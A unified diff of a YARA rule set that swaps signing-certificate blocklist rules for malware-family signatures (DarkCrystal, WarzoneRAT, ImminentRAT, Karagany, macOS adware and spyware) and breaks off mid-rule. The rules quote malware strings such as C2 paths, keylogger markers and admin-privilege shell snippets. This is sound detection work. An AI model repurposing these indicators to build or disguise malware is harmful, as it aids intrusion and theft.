-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Yandex" and pe.signatures [ i ] . serial == "37:69:81:5a:97:a8:fb:41:1e:00:52:82:b3:78:78:e3" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_3B007314844B114C61Bc156A0609A286 : FILE
+rule DITEKSHEN_MALWARE_Win_Rasftuby : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Rasftuby/DarkCrystal"
 		author = "ditekSHen"
-		id = "bb68c2fc-2389-5fb8-96f0-5731f008fd3c"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "908624a8-0068-5512-a5d0-77ce1f4efd80"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5682-L5693"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2933-L2950"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f6f4e551a9be96f43a81e4da69f7b312dbdc16da17659a00a3486543a9c078e9"
+		logic_hash = "b769c1986d23173cf8a8a3c8a14d388a7c0327e46d936fc97c449dc55f2a5575"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "52ae9fdda7416553ab696388b66f645e07e753cd"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.DarkCrystal.RAT-Rasftuby"
+
+	strings:
+		$s1 = "/DCRS/main.php?data=active" fullword ascii wide
+		$s2 = "/socket.php?type=__ds_" ascii wide
+		$s3 = "/uploader.php" fullword ascii wide
+		$s4 = "del \\\"%USERPROFILE%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\System.lnk\\\"" fullword ascii wide
+		$s5 = "Host:{0},Port:{1},User:{2},Pass:{3}<STR>" fullword ascii wide
+		$s6 = "keyloggerstart_status" fullword ascii wide
+		$s7 = "keyloggerstop_status" fullword ascii wide
+		$s8 = "[PRINT SCREEN]" fullword ascii wide
+		$s9 = "DCS.Internal" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SATURDAY CITY LIMITED" and pe.signatures [ i ] . serial == "3b:00:73:14:84:4b:11:4c:61:bc:15:6a:06:09:a2:86" )
+		uint16( 0 ) == 0x5a4d and 5 of ( $s* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_262Ca7Ae19D688138E75932832B18F9D : FILE
+rule DITEKSHEN_MALWARE_Win_Protonbot : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects ProtonBot loader"
 		author = "ditekSHen"
-		id = "891717e4-502f-5820-903c-3d9f2751a9d3"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "b0d08378-0297-5e70-99f1-1dc0fec6fa01"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5695-L5706"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2952-L2969"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0e6e75206bea63856e4ab07ff9b1220448f3cad6d845ae09703b9e836015520d"
+		logic_hash = "b511dfd47109d36ffc7fcb23b49779e1164d50a28061ab724d7a2c744ac23ac8"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c5d34eb26bbb3fcb274f9e9cb37f5ae6612747a1"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.ProtonBot"
+
+	strings:
+		$x1 = "\\PROTON\\Release\\build.pdb" ascii
+		$x2 = "\\proton\\proton bot\\json.hpp" wide
+		$x3 = "proton bot" ascii wide
+		$s1 = "endptr == token_buffer.data() + token_buffer.size()" fullword wide
+		$s2 = "ranges.size() == 2 or ranges.size() == 4 or ranges.size() == 6" fullword wide
+		$s3 = "ref_stack.back()->is_array() or ref_stack.back()->is_object()" fullword wide
+		$s4 = "ktmw32.dll" fullword ascii
+		$s5 = "@detail@nlohmann@@" ascii
+		$s6 = "urlmon.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bisoyetutu Ltd Ltd" and pe.signatures [ i ] . serial == "26:2c:a7:ae:19:d6:88:13:8e:75:93:28:32:b1:8f:9d" )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or ( all of ( $s* ) and 1 of ( $x* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_6B0008Bbd5Eb53F5D9E616C3Ed00000008Bbd5 : FILE
+rule DITEKSHEN_MALWARE_Win_Imminentrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects ImminentRAT"
 		author = "ditekSHen"
-		id = "51e670b5-a679-52ef-9c07-5a2bd21f8a20"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "99831b32-d8a0-5814-bf41-491f607ee825"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5708-L5719"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2971-L2994"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "185334d7f484585cd88a1d89516f805d0248234a61153f8a38cc78b52d4bd764"
+		logic_hash = "f959fd28e818b17c962fcd5bb99fa5ac0058f22494950e0200f139703f3e756a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a24cff3a026dc6b30fb62fb01dbda704eb07164f"
-		importance = 20
+
+	strings:
+		$x1 = "abuse@imminentmethods.net" ascii
+		$x2 = "Imminent-Monitor-" ascii
+		$x3 = "AddressChangeListener" fullword ascii
+		$x4 = "SevenZipHelper" fullword ascii
+		$x5 = "WrapNonExceptionThrows" fullword ascii
+		$s1 = "_ENABLE_PROFILING" wide
+		$s2 = "Anti-Virus: {0}" wide
+		$s3 = "File downloaded & executed" wide
+		$s4 = "Chat - You are speaking with" wide
+		$s5 = "\\Imminent\\Plugins" wide
+		$s6 = "\\Imminent\\Path.dat" wide
+		$s7 = "\\Imminent\\Geo.dat" wide
+		$s8 = "DisableTaskManager = {0}" wide
+		$s9 = "This client is already mining" wide
+		$s10 = "Couldn't get AV!" wide
+		$s11 = "Couldn't get FW!" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "microsoft.com" and pe.signatures [ i ] . serial == "6b:00:08:bb:d5:eb:53:f5:d9:e6:16:c3:ed:00:00:00:08:bb:d5" )
+		uint16( 0 ) == 0x5a4d and ( 4 of ( $x* ) or 5 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_6Abc3555Becca0Bc4B6987Ccc2Ea42B5 : FILE
+rule DITEKSHEN_MALWARE_Win_Warzonerat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects AveMaria/WarzoneRAT"
 		author = "ditekSHen"
-		id = "b3ced8b8-ec42-56e4-8a3e-9cb7f6845b6f"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "4f3df696-280c-5f2b-9511-8cc7c9dff1d6"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5721-L5732"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2996-L3011"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "76d4895f805a6638549c2d3b01a53873156e142d741b1fc2ccc0b18971b275a7"
+		logic_hash = "1af8b0f90b0de3287499082a6d6d9da6ed62a3110018e0c0f7149353693060b2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a36c75dd80d34020df5632c2939e82d39d2dca64"
-		importance = 20
+
+	strings:
+		$s1 = "RDPClip" fullword wide
+		$s2 = "Grabber" fullword wide
+		$s3 = "Ave_Maria Stealer OpenSource" wide
+		$s4 = "\\MidgetPorn\\workspace\\MsgBox.exe" wide
+		$s5 = "@\\cmd.exe" wide
+		$s6 = "/n:%temp%\\ellocnak.xml" wide
+		$s7 = "Hey I'm Admin" wide
+		$s8 = "warzone160" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jwkwjaagoh" and pe.signatures [ i ] . serial == "6a:bc:35:55:be:cc:a0:bc:4b:69:87:cc:c2:ea:42:b5" )
+		uint16( 0 ) == 0x5a4d and 5 of ( $s* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_3C5Fc5D02273F297404F7B9306E447Bb : FILE
+rule DITEKSHEN_MALWARE_Win_Karaganycore : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Karagany/xFrost core plugin"
 		author = "ditekSHen"
-		id = "2dd0805d-f43e-5aec-a0d9-98fc9fa6c088"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "c066805b-9373-5524-aff9-d16cd59f5a24"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5734-L5745"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3013-L3027"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e73fd0a38c76783e3110abe82411cc3d22fbbc95684667dc754618f590f29970"
+		logic_hash = "cde96ac6477fda1312ce4f7532018c9f11df7d39c40155d10bdde0e3d84c6d57"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "3fa4a6efd5e443627e9e32e6effe04c991f4fe8f"
-		importance = 20
+
+	strings:
+		$s1 = "127.0.0.1" fullword ascii
+		$s2 = "port" fullword ascii
+		$s3 = "C:\\Windows\\System32\\Kernel32.dll" fullword ascii
+		$s4 = "kernel32.dll" fullword ascii
+		$s5 = "http" ascii
+		$s6 = "Move" fullword ascii
+		$s7 = "<supportedOS Id=\"{" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Wirpool Soft" and pe.signatures [ i ] . serial == "3c:5f:c5:d0:22:73:f2:97:40:4f:7b:93:06:e4:47:bb" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_7D36Cbb64Bc9Add17Ba71737D3Ecceca : FILE
+rule DITEKSHEN_MALWARE_Win_Karaganykeylogger : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Karagany/xFrost keylogger plugin"
 		author = "ditekSHen"
-		id = "23786dd4-2ad2-5d86-a0d2-46bc5f1825eb"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "dd14ede0-7132-5b7f-872a-d96d5275a8e4"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5763-L5774"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3029-L3041"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "070600994d7e137a769432e7c5995dac90f01cbce2c50de4c5baecea5d556baf"
+		logic_hash = "7f1f5b2ca67e62380c8a8095fed4a4fd76d7bc15c9fe2d76e780ad85f886ef7b"
 		score = 75
-		quality = 75
+		quality = 23
 		tags = "FILE"
-		thumbprint = "a7287460dcf02e38484937b121ce8548191d4e64"
-		importance = 20
+
+	strings:
+		$s1 = "__klg__" fullword wide
+		$s2 = "__klgkillsoft__" fullword wide
+		$s3 = "CLIPBOARD_PASTE" wide
+		$s4 = "%s\\k%d.txt" wide
+		$s5 = "\\Update\\Tmp" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LTD SERVICES LIMITED" and pe.signatures [ i ] . serial == "7d:36:cb:b6:4b:c9:ad:d1:7b:a7:17:37:d3:ec:ce:ca" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Df7139E106Dbb68Dfe4De97D862Af708 : FILE
+rule DITEKSHEN_MALWARE_Win_Karaganyscreenutil : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Karagany/xFrost ScreenUtil module"
 		author = "ditekSHen"
-		id = "8da7c163-02a7-571e-a995-c1d500d90b5b"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "5eab1bb9-a433-54e6-963b-4aca863dc73f"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5776-L5787"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3043-L3055"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "503ff5f570191ac61a20c2a6ffa5117d5c3ed632c04c4a02c710644c18a494d0"
+		logic_hash = "d10230d94adfdddd604e2569ae3323efa1d5722647b9c704fceefe9446ccebd1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4ac627227a25f0914f3a73ff85d90b45da589329"
-		importance = 20
+
+	strings:
+		$s1 = "__pic__" ascii wide
+		$s2 = "__pickill__" ascii wide
+		$s3 = "\\picture.png" fullword wide
+		$s4 = "%d.jpg" wide
+		$s5 = "\\Update\\Tmp" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "zPfPJHDCzusZRYQYJZGZoFfZmvYtSlFXDPQKtoQzc" and pe.signatures [ i ] . serial == "00:df:71:39:e1:06:db:b6:8d:fe:4d:e9:7d:86:2a:f7:08" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00D4F9Fc08895654F8Bde8D1Cc26Eff015 : FILE
+rule DITEKSHEN_MALWARE_Win_Karaganylistrix : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Karagany/xFrost Listrix module"
 		author = "ditekSHen"
-		id = "d32f82a7-36dd-555f-87cf-28e520a3916f"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "837cc9e7-eefb-530c-854b-51bb4444ae78"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5789-L5800"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3057-L3069"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dfc90ce9c1d8a0fad9c50f61c90c4f7b00b6890ee45d218417f4a7196c3d1c18"
+		logic_hash = "02216061dbe93b7bea108f4b27c052d87c14cfe9395c6c5d4eed46ed7819e7ae"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f24af3a784c2316b42854c5853b53d9e556295f7"
-		importance = 20
+
+	strings:
+		$s1 = "\\Update\\Tmp\\" wide
+		$s2 = "*pass*.*" fullword wide
+		$s3 = ">> NUL" wide
+		$s4 = "%02d.%02d.%04d %02d:%02d" wide
+		$s5 = "/c del" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "kfbdAfVnDMDc" and pe.signatures [ i ] . serial == "00:d4:f9:fc:08:89:56:54:f8:bd:e8:d1:cc:26:ef:f0:15" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0393Be7Fd785Ba0E3223A73B15Ee6736 : FILE
+rule DITEKSHEN_MALWARE_Osx_Macsearch : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects MacSearch adware"
 		author = "ditekSHen"
-		id = "852c3c5c-e20c-5e45-acee-7f5a5a35fa24"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "facdf05c-5ee4-54c6-9ca3-01978af2b6e6"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5802-L5813"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3071-L3092"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6805b2d04f8b89b9d4db8d47d74e83b6cdd7e778b038883fc8d3ef2e1b157070"
+		logic_hash = "973b7215fc8d04685a46d05b53b4092e7b81ed0d64d6982b534f2b89d0a59443"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
-		thumbprint = "f50fc532839ca7e63315e468c493512db8b7ee83"
-		importance = 20
+
+	strings:
+		$s1 = "open -a safari" ascii
+		$s2 = "/INDownloader" ascii
+		$s3 = "/safefinder" ascii
+		$s4 = "/INEncryptor" ascii
+		$s5 = "/INInstallerFlow" ascii
+		$s6 = "/INConfiguration" ascii
+		$s7 = "/INChromeAndFFSetter" ascii
+		$s8 = "/INSafariSetter" ascii
+		$s9 = "/bin/launchctl" fullword ascii
+		$s10 = "/usr/bin/csrutil" fullword ascii
+		$s11 = "_Tt%cSs%zu%.*s%s" fullword ascii
+		$s12 = "_Tt%c%zu%.*s%zu%.*s%s" fullword ascii
+		$s13 = "/macap/safefinder_Obf/safefinder/" ascii
+		$s14 = "/safefinder.build/Release/macsearch.build/" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FZaKundypKakCIvoMBPpTnwIDUJM" and pe.signatures [ i ] . serial == "03:93:be:7f:d7:85:ba:0e:32:23:a7:3b:15:ee:67:36" )
+		uint16( 0 ) == 0xfacf and 10 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_008B7369B2F0C313634A1C1Dfc4A828A54 : FILE
+rule DITEKSHEN_MALWARE_Osx_Genieo : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects LinqurySearch/Genieo adware"
 		author = "ditekSHen"
-		id = "e4da4da0-68f1-548b-b307-e11ad6def316"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "ac44eefd-bf1c-5d4b-bcd4-9a5d394ac1d3"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5815-L5826"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3094-L3112"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "857eaa56ff5106e3808750b8833fd33a328b53a04f6fd2939aca30dbc6048329"
+		logic_hash = "951dc8539435a52d9eea00b3fdaf98cf618c03867066819f2f9244165e57c675"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "1cad5864bcc0f6aa20b99a081501a104b633dddd"
-		importance = 20
+		clamav_sig = "MALWARE.Osx.Trojan.Genieo"
+
+	strings:
+		$s1 = "<key>com.apple.security.get-task-allow</key>" fullword ascii
+		$s2 = "U1QQFXAfCxAfRUNCH1JZXh9" ascii
+		$s3 = "XVFTQ1VRQlNYH" ascii
+		$s4 = "dF9HXlxfUVQQVUJCX0IQHRB" ascii
+		$s5 = "Value:forHTTPHeaderField:" ascii
+		$s6 = "postContent:::" fullword ascii
+		$s7 = "postLog:" fullword ascii
+		$s8 = "initWithBase64EncodedString:options:" fullword ascii
+		$s9 = "do shell script \"%@\" with administrator privileges" fullword ascii
+		$s10 = /LinqurySearch-[a-f0-9]{40,}/
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LFpKdFUgpGKj" and pe.signatures [ i ] . serial == "00:8b:73:69:b2:f0:c3:13:63:4a:1c:1d:fc:4a:82:8a:54" )
+		uint16( 0 ) == 0xfacf and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_59A57E8Ba3Dcf2B6F59981Fda14B03 : FILE
+rule DITEKSHEN_MALWARE_Osx_AMCPCVARK : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects OSX TechyUtils/PCVARK adware"
 		author = "ditekSHen"
-		id = "07e68e53-ffb8-5f12-ad0e-cf64a3c9cb72"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "1378364b-db10-5194-98f8-5347504a92e6"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5828-L5841"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3114-L3139"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1eeeef14502daafb303d1c09d8e55fb4df57a6bf250d1adc7e53862f2f5d5824"
+		logic_hash = "b18a9f578af98feb5107d9ef85850457ba5921ab58af7b097a815e3af74f05f7"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e201821e152d7ae86078c4e6a3a3a1e1c5e29f9a"
-		hash1 = "d9ace2d97010316fdb0f416920232e8d4c59b01614633c4d5def79abb15d0175"
-		hash2 = "80e363dee08f4f77e5a061c10f18503c7ce802818cf6bb1c8a16da0ba3877b01"
-		importance = 20
+		clamav_sig = "MALWARE.Osx.Adware.AMC-PCVARK-TechyUtils"
+
+	strings:
+		$s1 = "Mac Auto Fixer.app" fullword ascii
+		$s2 = "com.techyutil.macautofixer" fullword ascii
+		$s3 = "com.findApp.findApp" ascii
+		$s4 = "Library/Preferences/%@.plist" fullword ascii
+		$s5 = "Library/%@/%@" fullword ascii
+		$s6 = "Library/Application Support/%@/%@" fullword ascii
+		$s7 = "sleep 3; rm -rf \"%@\"" fullword ascii
+		$s8 = "Silently calling url: %@" ascii
+		$cnc1 = "cloudfront.net/getdetails" ascii
+		$cnc2 = "trk.entiretrack.com/trackerwcfsrv/tracker.svc/trackOffersAccepted/?" ascii
+		$cnc3 = "pxl=%@&x-count=1&utm_source=%@&lpid=0&utm_content=&utm_term=&x-base=&utm_medium=%@&utm_publisher=%@&offerpxl=&x-fetch=1&utm_campaign=@&affiliateid=&x-at=&btnid=" ascii
+		$x1 = "mafsysinfo" fullword ascii
+		$x2 = "MAF4497_MAF4399_MAF2204" ascii
+		$developerid = "Developer ID Application: Rahul Gahlot (RZ74UYT742)" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Medium LLC" and pe.signatures [ i ] . serial == "59:a5:7e:8b:a3:dc:f2:b6:f5:99:81:fd:a1:4b:03" )
+		uint16( 0 ) == 0xfacf and ( 6 of ( $s* ) or 2 of ( $cnc* ) or all of ( $x* ) or $developerid )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00C79F817F082986Bef3209F6723C8Da97 : FILE
+rule DITEKSHEN_MALWARE_Osx_Realtimespy : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects macOS RealtimeSpy monitoring app"
 		author = "ditekSHen"
-		id = "2e831cd7-6992-5b5f-ad84-52590f3cc65a"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "6485abf3-896c-54cd-ad84-7bd86456e47b"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5843-L5856"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3141-L3166"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b6dd9cb0d2383bce3ab13b6a660b3f5ba554a2bf1fce4aabb6dd36187cc57f45"
+		logic_hash = "4ef2e1b8d34962cd3eab23f401b764b38b8332233aa2ae91b218af499d8ab8ff"
 		score = 75
-		quality = 75
+		quality = 57
 		tags = "FILE"
-		thumbprint = "e2bf86dc46fca1c35f98ff84d8976be8aa0668bc"
-		hash1 = "dd49651e325b04ea14733bcd676c0a1cb58ab36bf79162868ade02b396ec3ab0"
-		hash2 = "823cb4b92a1266c880d917c7d6f71da37d524166287b30c0c89b6bb03c2e4b64"
-		importance = 20
+		clamav_sig = "MALWARE.Osx.Trojan.RealtimeSpy"
+
+	strings:
+		$x1 = "SPYAGENT4HASHCIPHER" fullword ascii
+		$x2 = ":username:password:acctid:compUser:compName:" ascii
+		$x3 = ":username:password:acctid:compName:" ascii
+		$x4 = "://www.realtime-spy-mac.com/" ascii
+		$x5 = "/Users/spytech/" ascii
+		$x6 = "shell script \"touch /private/var/db/.AccessibilityAPIEnabled\" password \"pwd\" with administrator privileges" ascii
+		$x7 = "Content-Disposition: form-data; name=\"raptor_" ascii
+		$c1 = "_OBJC_CLASS_$_LocationLogger" fullword ascii
+		$c2 = "_OBJC_CLASS_$_MonitoringFunctions" fullword ascii
+		$c3 = "_OBJC_CLASS_$_ProcessLogger" fullword ascii
+		$c4 = "_OBJC_CLASS_$_RealtimeLoggingFunctions" fullword ascii
+		$c5 = "_OBJC_CLASS_$_Realtime_SpyAppDelegate" fullword ascii
+		$c6 = "_OBJC_CLASS_$_ScreenshotLogger" fullword ascii
+		$c7 = "_OBJC_CLASS_$_Uploader" fullword ascii
+		$c8 = "_OBJC_CLASS_$_UsageLogger" fullword ascii
+		$c9 = "_OBJC_CLASS_$_WebsiteLogger" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Al-Faris group d.o.o." and pe.signatures [ i ] . serial == "00:c7:9f:81:7f:08:29:86:be:f3:20:9f:67:23:c8:da:97" )
+		uint16( 0 ) == 0xfacf and ( 2 of ( $x* ) or 2 of ( $c* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Beb721Fcb3274C984479D6554Efe8F49 : FILE
+rule DITEKSHEN_MALWARE_Osx_Maxofferdeal : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects macOS MaxOfferDeal adware"
 		author = "ditekSHen"
-		id = "311b4a7a-3185-5c61-961e-bd7d9bca28dd"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "aec4ab77-7025-5856-99fb-aa7b86413c00"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5858-L5869"
